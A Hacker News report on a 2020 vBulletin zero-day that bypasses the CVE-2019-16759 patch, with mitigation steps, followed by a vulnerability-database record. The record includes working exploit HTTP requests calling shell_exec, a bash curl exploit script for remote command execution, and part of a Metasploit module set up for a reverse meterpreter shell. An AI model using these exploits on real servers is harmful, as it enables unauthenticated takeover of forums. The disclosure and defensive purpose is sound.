[](<https://thehackernews.com/images/-avcE0-MsDpE/XzKfvb9seAI/AAAAAAAA3LA/z6zYA7G0SpYPCBYnwueCw64DYdEBO5kWgCLcBGAsYHQ/s728-e100/vBulletin-zero-day-exploit.jpg>)
A security researcher earlier today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability affecting the widely used internet forum software **vBulletin** that's already under active exploitation in the wild.
vBulletin is a widely used proprietary Internet forum software package based on PHP and MySQL database server that powers over 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums.
In September last year, a separate anonymous security researcher publicly disclosed a then-zero-day [RCE vulnerability in vBulletin](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), identified as **CVE-2019-16759**, and received a critical severity rating of 9.8, allowing attackers to execute malicious commands on the remote server without requiring any authentication to log into the forum.
A day after the disclosure of CVE-2019-16759, the vBulletin team released [security patches](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch>) that resolved the issue, but it turns out that the patch was insufficient in blocking the exploitation of the flaw.
## Bypassing the Patch for the CVE-2019-16759 RCE Flaw
The newly released zero-day, discovered, and [publicly published](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>) by security researcher Amir Etemadieh (Zenofex), is a bypass for CVE-2019-16759. The flaw did not receive any CVE identifier at the time this blog post was published.
The latest zero-day [vulnerability](<https://twitter.com/h4x0r_dz/status/1292759555034828800>) should be viewed as a severe issue because it is remotely exploitable and doesn't require authentication. It can easily be exploited using an exploit code of a single one-line command that can result in remote code execution in the latest vBulletin software.
[](<https://thehackernews.com/images/-NRDjCxAfxNM/XzKePwkgs1I/AAAAAAAA3K4/52jN7EldbhU9z9MyL06SM4E_qaag6zeiACLcBGAsYHQ/s728-e100/vulnerability.jpg>)
According to the researcher, the patch for CVE-2019-16759 did not resolve the issues present in the "widget_tabbedcontainer_tab_panel" template, i.e., its ability to load a user-controlled child template and to load the child template, it takes a value from a separately named value and places it into a variable named "widgetConfig," effectively allowing the researcher to bypass the patch for CVE-2019-16759.
The researcher also published three proofs-of-concept exploit payloads written in multiple languages, including Bash, Python, and Ruby.
## Hackers Actively Exploiting vBulletin Zero-Day
Soon after the release of the PoC exploit code, hackers started exploiting the zero-day to [target vBulletin sites](<https://gist.github.com/Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b>).
According to DefCon and Black Hat security conferences creator Jeff Moss, the DefCon forum was also attacked with the exploit just 3 hours after the flaw was disclosed.
"A new VBulletin Zero Day got dropped yesterday by @Zenofex that revealed the CVE-2019-16759 patch was incomplete - within three hours https://forum.defcon.org was attacked, but we were ready for it. Disable PHP rendering to protect yourself until patched!," said [Moss](<https://twitter.com/thedarktangent/status/1292813958332596224>).
## Official vBulletin Patch and Mitigations
The vBulletin team responded to the publicly released zero-day flaw immediately and released a new security patch that disables the PHP module in vBulletin software to address the issue, assuring its users that it will be removed entirely in the future release of vBulletin 5.6.4.
The forum maintainers advised developers to consider all older versions of vBulletin vulnerable and upgrade their sites to run vBulletin 5.6.2 as soon as possible. Developers can check Quick Overview: [Upgrading vBulletin Connect](<https://forum.vbulletin.com/node/4391346/>) in the support forums for more information on upgrading.
Though The Hacker News strongly advise users and developers to upgrade their forums to the new vBulletin version, those who can not update immediately can mitigate the new zero-day by disabling PHP widgets within your forums, to do this:
* Go to the vBulletin administrator control panel and click "Settings" in the menu on the left, then "Options" in the dropdown.
* Choose "General Settings" and then click "Edit Settings."
* Look for "Disable PHP, Static HTML, and Ad Module rendering," Set to "Yes."
* Click "Save"
Note that these changes could break some functionality but will mitigate the issue until you plan to apply the official security patches.
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"id": "THN:7EC88D1EE2BF2C54F23228C61EC1A5B0", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "A New vBulletin 0-Day RCE Vulnerability and Exploit Disclosed Publicly", "description": "[](<https://thehackernews.com/images/-avcE0-MsDpE/XzKfvb9seAI/AAAAAAAA3LA/z6zYA7G0SpYPCBYnwueCw64DYdEBO5kWgCLcBGAsYHQ/s728-e100/vBulletin-zero-day-exploit.jpg>)\n\nA security researcher earlier today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability affecting the widely used internet forum software **vBulletin** that's already under active exploitation in the wild. \n \nvBulletin is a widely used proprietary Internet forum software package based on PHP and MySQL database server that powers over 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. \n \nIn September last year, a separate anonymous security researcher publicly disclosed a then-zero-day [RCE vulnerability in vBulletin](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), identified as **CVE-2019-16759**, and received a critical severity rating of 9.8, allowing attackers to execute malicious commands on the remote server without requiring any authentication to log into the forum. \n \nA day after the disclosure of CVE-2019-16759, the vBulletin team released [security patches](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch>) that resolved the issue, but it turns out that the patch was insufficient in blocking the exploitation of the flaw. \n \n\n\n## Bypassing the Patch for the CVE-2019-16759 RCE Flaw\n\n \nThe newly released zero-day, discovered, and [publicly published](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>) by security researcher Amir Etemadieh (Zenofex), is a bypass for CVE-2019-16759. The flaw did not receive any CVE identifier at the time this blog post was published. \n \nThe latest zero-day [vulnerability](<https://twitter.com/h4x0r_dz/status/1292759555034828800>) should be viewed as a severe issue because it is remotely exploitable and doesn't require authentication. It can easily be exploited using an exploit code of a single one-line command that can result in remote code execution in the latest vBulletin software. \n \n\n\n[](<https://thehackernews.com/images/-NRDjCxAfxNM/XzKePwkgs1I/AAAAAAAA3K4/52jN7EldbhU9z9MyL06SM4E_qaag6zeiACLcBGAsYHQ/s728-e100/vulnerability.jpg>)\n\n \nAccording to the researcher, the patch for CVE-2019-16759 did not resolve the issues present in the \"widget_tabbedcontainer_tab_panel\" template, i.e., its ability to load a user-controlled child template and to load the child template, it takes a value from a separately named value and places it into a variable named \"widgetConfig,\" effectively allowing the researcher to bypass the patch for CVE-2019-16759. \n \nThe researcher also published three proofs-of-concept exploit payloads written in multiple languages, including Bash, Python, and Ruby. \n \n\n\n## Hackers Actively Exploiting vBulletin Zero-Day\n\n \nSoon after the release of the PoC exploit code, hackers started exploiting the zero-day to [target vBulletin sites](<https://gist.github.com/Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b>). \n \nAccording to DefCon and Black Hat security conferences creator Jeff Moss, the DefCon forum was also attacked with the exploit just 3 hours after the flaw was disclosed. \n \n\"A new VBulletin Zero Day got dropped yesterday by @Zenofex that revealed the CVE-2019-16759 patch was incomplete - within three hours https://forum.defcon.org was attacked, but we were ready for it. Disable PHP rendering to protect yourself until patched!,\" said [Moss](<https://twitter.com/thedarktangent/status/1292813958332596224>). \n \n\n\n## Official vBulletin Patch and Mitigations\n\n \nThe vBulletin team responded to the publicly released zero-day flaw immediately and released a new security patch that disables the PHP module in vBulletin software to address the issue, assuring its users that it will be removed entirely in the future release of vBulletin 5.6.4. \n \nThe forum maintainers advised developers to consider all older versions of vBulletin vulnerable and upgrade their sites to run vBulletin 5.6.2 as soon as possible. Developers can check Quick Overview: [Upgrading vBulletin Connect](<https://forum.vbulletin.com/node/4391346/>) in the support forums for more information on upgrading. \n \nThough The Hacker News strongly advise users and developers to upgrade their forums to the new vBulletin version, those who can not update immediately can mitigate the new zero-day by disabling PHP widgets within your forums, to do this: \n \n \n\n\n * Go to the vBulletin administrator control panel and click \"Settings\" in the menu on the left, then \"Options\" in the dropdown.\n * Choose \"General Settings\" and then click \"Edit Settings.\" \n * Look for \"Disable PHP, Static HTML, and Ad Module rendering,\" Set to \"Yes.\" \n * Click \"Save\"\n \n \nNote that these changes could break some functionality but will mitigate the issue until you plan to apply the official security patches. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2020-08-11T13:40:00", "modified": "2020-08-11T14:36:46", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2019-16759"], "immutableFields": [], "lastseen": "2022-05-09T12:40:12", "viewCount": 351, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1BF8711C-479C-44AE-A936-EC1160F0DC29", "AKB:5E7D92C4-95C2-4657-A64B-B29ABFC4C3DD", "AKB:CA669EF0-5D3E-445F-85DB-FF93E6E3FEAF", "AKB:D8D0585E-24B7-40BE-BB84-83A85D733DDB"]}, {"type": "canvas", "idList": ["VBULLETIN_WIDGET_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1100"]}, {"type": "cve", "idList": ["CVE-2019-16759", "CVE-2020-17496", "CVE-2020-7373"]}, {"type": "exploitdb", "idList": ["EDB-ID:47437", "EDB-ID:48743"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2"]}, {"type": "githubexploit", "idList": ["466BD20E-73F1-585B-8C2D-1B77366E07FB", "4E77ED8E-242D-57A1-896F-06853902D509", "5EE05991-6442-518F-9E3D-D23E4DFD6F1C", "70C9DEB1-4305-5695-89DB-52A0F2D5EC86", "AA667A5B-9A75-56CD-9856-E0E33AF472EE", "AD9CC4D7-BA6E-59EF-9EFB-25F48D026054", "BCBE32AA-279A-5A30-9754-EB46C6097EF9", "D3A62E89-01F9-5BF8-AB5C-D80CDF936E3C", "E4B3128C-2985-55D6-AC83-E0946C875D2D", "E827264A-33DB-5591-9107-3B2C883318B9"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:132460062C8A11A5A73F937DEAA67CB9", "IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-VBULLETIN_WIDGET_TEMPLATE_RCE-"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}, {"type": "nessus", "idList": ["VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL", "VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL", "WEB_APPLICATION_SCANNING_98764"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142932"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154623", "PACKETSTORM:154648", "PACKETSTORM:155633", "PACKETSTORM:158829", "PACKETSTORM:158830", "PACKETSTORM:158866"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "thn", "idList": ["THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0", "THN:86C3930A6E4C818EFA5133059C21FA57", "THN:DA6A48C093F31D7EE1BB90D7EE577177"]}, {"type": "threatpost", "idList": ["THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7"]}, {"type": "zdt", "idList": ["1337DAY-ID-33300", "1337DAY-ID-33648", "1337DAY-ID-34823", "1337DAY-ID-34826"]}]}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:1BF8711C-479C-44AE-A936-EC1160F0DC29", "AKB:5E7D92C4-95C2-4657-A64B-B29ABFC4C3DD", "AKB:D8D0585E-24B7-40BE-BB84-83A85D733DDB"]}, {"type": "canvas", "idList": ["VBULLETIN_WIDGET_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1100"]}, {"type": "cve", "idList": ["CVE-2019-16759"]}, {"type": "exploitdb", "idList": ["EDB-ID:47437"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2"]}, {"type": "githubexploit", "idList": ["466BD20E-73F1-585B-8C2D-1B77366E07FB", "4E77ED8E-242D-57A1-896F-06853902D509", "5EE05991-6442-518F-9E3D-D23E4DFD6F1C", "70C9DEB1-4305-5695-89DB-52A0F2D5EC86", "AA667A5B-9A75-56CD-9856-E0E33AF472EE", "AD9CC4D7-BA6E-59EF-9EFB-25F48D026054", "BCBE32AA-279A-5A30-9754-EB46C6097EF9", "D3A62E89-01F9-5BF8-AB5C-D80CDF936E3C", "E4B3128C-2985-55D6-AC83-E0946C875D2D", "E827264A-33DB-5591-9107-3B2C883318B9"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_WIDGETCONFIG_RCE"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}, {"type": "nessus", "idList": ["VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154623", "PACKETSTORM:154648", "PACKETSTORM:155633"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "thn", "idList": ["THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0", "THN:86C3930A6E4C818EFA5133059C21FA57"]}, {"type": "threatpost", "idList": ["THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7"]}, {"type": "zdt", "idList": ["1337DAY-ID-33300", "1337DAY-ID-33648"]}]}, "exploitation": null, "vulnersScore": -0.4}, "_state": {"dependencies": 1660004461, "score": 1659882119}, "_internal": {"score_hash": "bf47b81d7af9fce09e80cc3af73afd61"}}
{"attackerkb": [{"lastseen": "2022-05-09T23:42:43", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-16759", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-28T00:00:00", "id": "AKB:CA669EF0-5D3E-445F-85DB-FF93E6E3FEAF", "href": "https://attackerkb.com/topics/lM66oN2W6f/cve-2019-16759", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-22T20:43:19", "description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at June 11, 2020 5:05pm UTC reported:\n\nVuln affects versions 5.0.0 to 5.5.4 and is weaponized in the form of a Metasploit module: <https://github.com/rapid7/metasploit-framework/pull/13512> \nCredit to Charles Fol for discovery and Zenofex for fast analysis and slick weaponization.\n\nI keep thinking that it\u2019s unlikely enterprises use vBulletin and this must be more of a risk to small- and medium-sized businesses, but looking at some of the companies that are said to be vBulletin customers, I suppose that\u2019s not necessarily true. [Article on in-the-wild exploitation here.](<https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/>)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2020-12720 vBulletin incorrect access control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-12720"], "modified": "2021-07-22T00:00:00", "id": "AKB:1BF8711C-479C-44AE-A936-EC1160F0DC29", "href": "https://attackerkb.com/topics/RSDAFLik92/cve-2020-12720-vbulletin-incorrect-access-control", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-07T17:10:39", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at September 02, 2020 1:23pm UTC reported:\n\nA vulnerability exists in vBulletin that can allow the protections originally put in place to address [CVE-2019-16759](<https://attackerkb.com/topics/lM66oN2W6f/cve-2019-16759>) to be bypassed. The vulnerability exists in how the patch handles child templates that are rendered by the `widget_php` template. A detailed write up which analyzes the patch and describes the issue regarding the child templates was posted to [blog.exploitee.rs](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>) by the original author who discovered the vulnerability.\n\nSuccessful exploitation involves an HTTP POST request and yields code execution in the context of the web application user. Due to the nature of templates, the result of the evaluation is included in the rendered output, allowing attackers to retrieve the output of their commands which makes the vulnerability more useful.\n \n \n POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\n Host: 192.168.250.5\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 168\n \n subWidgets%5b0%5d%5btemplate%5d=widget_php&subWidgets%5b0%5d%5bconfig%5d%5bcode%5d=echo%20shell_exec%28base64_decode%28%27ZWNobyBra3hmenJLeQ%3d%3d%27%29%29%3b%20exit%3b\n \n\nThis vulnerability was fixed in vBulletin version 5.6.3, with patches [released](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch#post4445228>) for versions 5.6.0, 5.6.1 and 5.6.2.\n\nTo temporarily remediate the vulnerability, delete the \u201cwidget_php\u201d module by following [these steps](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch#post4445228>):\n\n 1. Put the site into debug mode. \n\n 2. Log into the AdminCP. \n\n 3. Go to Styles > Style Manager. \n\n 4. Open the template list for the MASTER style. \n\n 5. Scroll to the bottom where it says Module Templates. \n\n 6. Highlight the widget_php module. \n\n 7. Click the Revert Button.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-17496", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2022-11-03T00:00:00", "id": "AKB:D8D0585E-24B7-40BE-BB84-83A85D733DDB", "href": "https://attackerkb.com/topics/2GE9f3C0gk/cve-2020-17496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:14:43", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at August 13, 2020 9:24pm UTC reported:\n\nThis vulnerable allows an unauthenticated attacker to run arbitrary PHP code or operating system commands on affected versions of the vBulletin web application. The vulnerability, which was also discovered by Zenofex, is identified as CVE-2020-7373 and is effectively a bypass for a previously patched vulnerability identified as CVE-2019-16759. Administrators running vBulletin should patch this one immediately.\n\nExample POST request that would trigger the vulnerability:\n \n \n POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\n Host: 192.168.249.2\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 168\n \n subWidgets%5b0%5d%5btemplate%5d=widget_php&subWidgets%5b0%5d%5bconfig%5d%5bcode%5d=echo%20shell_exec%28base64_decode%28%27ZWNobyB3elV4d2VJag%3d%3d%27%29%29%3b%20exit%3b\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-7373", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496", "CVE-2020-7373"], "modified": "2020-11-13T00:00:00", "id": "AKB:5E7D92C4-95C2-4657-A64B-B29ABFC4C3DD", "href": "https://attackerkb.com/topics/aIL9b0uOYc/cve-2020-7373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-08-12T01:26:42", "description": "", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T00:00:00", "id": "PACKETSTORM:158829", "href": "https://packetstormsecurity.com/files/158829/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# \n# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex \n#<br># Usage ./exploit <site> <shell-command><br> \n# Urlencode cmd \nCMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),\"\\n\"'` \n \n# Send request \ncurl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec(\"'+$CMD+'\");exit;' \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158829/vbulletin50-exec.sh.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T23:36:08", "description": "", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "packetstorm", "title": "vBulletin 5.5.4 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-12-10T00:00:00", "id": "PACKETSTORM:155633", "href": "https://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin widgetConfig RCE', \n'Description' => %q{ \nvBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] \nparameter in an ajax/render/widget_php routestring POST request. \n}, \n'Author' => [ \n'unknown', # discovered by an unknown sender. \n'mekhalleh (RAMELLA S\u00e9bastien)' # this module. \n], \n'References' => [ \n['CVE', '2019-16759'], \n['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'], \n['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html'] \n], \n'DisclosureDate' => '2019-09-23', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'windows'], \n'Arch' => [ARCH_CMD, ARCH_PHP], \n'Privileged' => true, \n'Targets' => [ \n['Meterpreter (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => [ARCH_PHP], \n'Type' => :php_memory, \n'Payload' => { \n'BadChars' => \"\\x22\", \n}, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (CMD In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n['Windows (CMD In-Memory)', \n'Platform' => 'windows', \n'Arch' => ARCH_CMD, \n'Type' => :windows_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'DisablePayloadHandler' => 'true' \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']), \nOptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']]) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n 